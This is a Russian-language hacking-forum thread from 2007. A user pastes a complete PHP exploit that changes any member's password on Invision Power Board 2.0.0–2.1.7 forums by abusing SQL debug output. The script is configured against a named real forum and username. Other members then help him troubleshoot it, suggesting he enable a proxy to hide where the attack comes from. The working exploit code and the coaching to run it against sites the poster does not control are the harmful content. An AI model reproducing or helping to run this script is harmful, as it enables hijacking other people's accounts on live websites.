Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
(Debug) Remote Password Change Exploit |
10.12.2007, 22:24
|
|
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313
Репутация:
3
|
|
(Debug) Remote Password Change Exploit
пишет
PHP Notice: Underined variable: proxy in C:\1.php on line 38
PHP Notice: Underined variable: proxy in C:\1.php on line 50
Error: Probably not vulnerable, or no forum found
Прокси работает 100%
Что делать?
|
|
|
10.12.2007, 22:26
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
код вайла 1.php выложить для начала
|
|
|
|
10.12.2007, 22:27
|
|
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772
Репутация:
517
|
|
да, кста, на нотифики не обращай внимания, а вот строчка
Error: Probably not vulnerable, or no forum found
говорит.... сам переведи кароч  а то неинтересно даже... |
|
|
|
10.12.2007, 22:29
|
|
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313
Репутация:
3
|
|
<?php
/*
Debug Mode password change vulnerability
Affects Invision Power Borard 2.0.0 to 2.1.7
by Rapigator
This works if:
"Debug Level" is set to 3
or
Enable SQL Debug Mode is turned on
In General Configuration of the forum software.
*/
// The forum's address up to and including 'index.php'
$site = "http://idc.user.kz/index.php";
// An existing user's login name
$name = "Mitiay";
// The new password(3-32 characters)
$pass = "123456";
// You can use a proxy...
// $proxy = "24.76.187.29:41679";
// -----------------------------
$site .= "";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$regid }®_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={ $vid}®id={$regid}®_code={$regcode}&pass1={$p ass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
вот
|
|
|
|
10.12.2007, 22:32
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
раскоменнтируй строку // $proxy = "24.76.187.29:41679";
|
|
|
|
10.12.2007, 22:34
|
|
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313
Репутация:
3
|
|
Прокся
а надо Socks или http ?
|
|
|
|
10.12.2007, 22:35
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
// $proxy = "24.76.187.29:41679";
замени на
$proxy = "24.76.187.29:41679";
Надо http
|
|
|
|
10.12.2007, 22:40
|
|
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313
Репутация:
3
|
|
теперь тока Error: Probably not vulnerable, or no forum found
Я где то видел что он не пашет на таких доменнах xxx.xxx.ru и то что тока на таких
xxx.ru/forum/
Это правда?
|
|
|
|
10.12.2007, 22:44
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062
Репутация:
1079
|
|
http://idc.user.kz не грузится вообще.
Не знаю.
|
|
|
|
10.12.2007, 22:50
|
|
Banned
Регистрация: 14.11.2007
Сообщений: 35
Провел на форуме:
145313
Репутация:
3
|
|
Пробывал на другом форуме всеровно Error: Probably not vulnerable, or no forum found
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
